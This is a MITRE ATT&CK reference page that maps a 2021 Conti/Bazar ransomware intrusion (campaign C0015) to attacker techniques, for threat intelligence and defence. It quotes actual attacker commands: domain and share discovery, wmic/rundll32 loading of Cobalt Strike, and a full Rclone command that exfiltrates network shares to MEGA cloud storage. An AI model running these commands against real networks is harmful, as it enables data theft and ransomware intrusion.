ATT&CKReferencesDFIR Conti Bazar Nov 2021

DFIR Conti Bazar Nov 2021

DFIR Report. (2021, November 29). CONTInuing the Bazar Ransomware Story. Retrieved September 29, 2022.

Open the source

Techniques0

Not cited by any technique.

Groups0

None recorded.

Software1

Campaigns1

Procedure examples42

TechniqueUsed byProcedure example
T1005
Data from Local System
CampaignC0015

During C0015, the threat actors obtained files and data from the compromised network.

T1016
System Network Configuration Discovery
CampaignC0015

During C0015, the threat actors used code to obtain the external public-facing IPv4 address of the compromised host.

T1018
Remote System Discovery
CampaignC0015

During C0015, the threat actors used the commands `net view /all /domain` and `ping` to discover remote systems. They also used PowerView's PowerShell Invoke-ShareFinder script for file share enumeration.

T1021.001
Remote Desktop Protocol
CampaignC0015

During C0015, the threat actors used RDP to access specific network hosts of interest.

T1027
Obfuscated Files or Information
CampaignC0015

During C0015, the threat actors used Base64-encoded strings.

T1030
Data Transfer Size Limits
CampaignC0015

During C0015, the threat actors limited Rclone's bandwidth setting during exfiltration.

T1030
Data Transfer Size Limits
ToolRclone

The Rclone "chunker" overlay supports splitting large files in smaller chunks during upload to circumvent size limits.

T1036
Masquerading
CampaignC0015

During C0015, the threat actors named a binary file `compareForfor.jpg` to disguise it as a JPG file.

T1039
Data from Network Shared Drive
CampaignC0015

During C0015, the threat actors collected files from network shared drives prior to network encryption.

T1047
Windows Management Instrumentation
MalwareCobalt Strike

Cobalt Strike can use WMI to deliver a payload to a remote host.

T1047
Windows Management Instrumentation
CampaignC0015

During C0015, the threat actors used `wmic` and `rundll32` to load Cobalt Strike onto a target host.

T1055
Process Injection
MalwareCobalt Strike

Cobalt Strike can inject a variety of payloads into processes dynamically chosen by the adversary.

T1055.001
Dynamic-link Library Injection
CampaignC0015

During C0015, the threat actors used a DLL named `D8B3.dll` that was injected into the Winlogon process.

T1057
Process Discovery
CampaignC0015

During C0015, the threat actors used the `tasklist /s` command as well as `taskmanager` to obtain a list of running processes.

T1059.003
Windows Command Shell
CampaignC0015

During C0015, the threat actors used `cmd.exe` to execute commands and run malicious binaries.

T1059.003
Windows Command Shell
MalwareConti

Conti can utilize command line options to allow an attacker control over how it scans and encrypts files.

T1059.005
Visual Basic
CampaignC0015

During C0015, the threat actors used a malicious HTA file that contained a mix of HTML and JavaScript/VBScript code.

T1059.007
JavaScript
CampaignC0015

During C0015, the threat actors used a malicious HTA file that contained a mix of encoded HTML and JavaScript/VBScript code.

T1069.001
Local Groups
CampaignC0015

During C0015, the threat actors used the command `net localgroup "adminstrator" ` to identify accounts with local administrator rights.

T1069.002
Domain Groups
CampaignC0015

During C0015, the threat actors use the command `net group "domain admins" /dom` to enumerate domain groups.

T1071.001
Web Protocols
MalwareBazar

Bazar can use HTTP and HTTPS over ports 80 and 443 in C2 communications.

T1074.001
Local Data Staging
CampaignC0015

During C0015, PowerView's file share enumeration results were stored in the file `c:\ProgramData\found_shares.txt`.

T1083
File and Directory Discovery
CampaignC0015

During C0015, the threat actors conducted a file listing discovery against multiple hosts to ensure locker encryption was successful.

T1105
Ingress Tool Transfer
CampaignC0015

During C0015, the threat actors downloaded additional tools and files onto a compromised network.

T1124
System Time Discovery
CampaignC0015

During C0015, the threat actors used the command `net view /all time` to gather the local time of a compromised network.

T1135
Network Share Discovery
CampaignC0015

During C0015, the threat actors executed the PowerView ShareFinder module to identify open shares.

T1204.002
Malicious File
CampaignC0015

During C0015, the threat actors relied on users to enable macros within a malicious Microsoft Word document.

T1218.005
Mshta
CampaignC0015

During C0015, the threat actors used `mshta` to execute DLLs.

T1218.010
Regsvr32
CampaignC0015

During C0015, the threat actors employed code that used `regsvr32` for execution.

T1218.011
Rundll32
CampaignC0015

During C0015, the threat actors loaded DLLs via `rundll32` using the `svchost` process.

T1218.011
Rundll32
MalwareCobalt Strike

Cobalt Strike can use `rundll32.exe` to load DLL from the command line.

T1219.002
Remote Desktop Software
CampaignC0015

During C0015, the threat actors installed the AnyDesk remote desktop application onto the compromised network.

T1482
Domain Trust Discovery
CampaignC0015

During C0015, the threat actors used the command `nltest /domain_trusts /all_trusts` to enumerate domain trusts.

T1486
Data Encrypted for Impact
MalwareConti

Conti can use CreateIoCompletionPort(), PostQueuedCompletionStatus(), and GetQueuedCompletionPort() to rapidly encrypt files, excluding those with the extensions of .exe, .dll, and .lnk. It has used a different AES-256 encryption key per file with a bundled RAS-4096 public encryption key that is unique for each victim. Conti can use “Windows Restart Manager” to ensure files are unlocked and open for encryption.

T1486
Data Encrypted for Impact
CampaignC0015

During C0015, the threat actors used Conti ransomware to encrypt a compromised network.

T1553.002
Code Signing
CampaignC0015

For C0015, the threat actors used DLL files that had invalid certificates.

T1566.001
Spearphishing Attachment
CampaignC0015

For C0015, security researchers assessed the threat actors likely used a phishing campaign to distribute a weaponized attachment to victims.

T1567.002
Exfiltration to Cloud Storage
ToolRclone

Rclone can exfiltrate data to cloud storage services such as Dropbox, Google Drive, Amazon S3, and MEGA.

T1567.002
Exfiltration to Cloud Storage
CampaignC0015

During C0015, the threat actors exfiltrated files and sensitive data to the MEGA cloud storage site using the Rclone command `rclone.exe copy --max-age 2y "\\SERVER\Shares" Mega:DATA -q --ignore-existing --auto-confirm --multi-thread-streams 7 --transfers 7 --bwlimit 10M`.

T1570
Lateral Tool Transfer
CampaignC0015

During C0015, the threat actors used WMI to load Cobalt Strike onto additional hosts within a compromised network.

T1588.001
Malware
CampaignC0015

For C0015, the threat actors used Cobalt Strike and Conti ransomware.

T1588.002
Tool
CampaignC0015

For C0015, the threat actors obtained a variety of tools, including AdFind, AnyDesk, and Process Hacker.

Data from MITRE ATT&CK® (Enterprise). ATT&CK® is a registered trademark of The MITRE Corporation.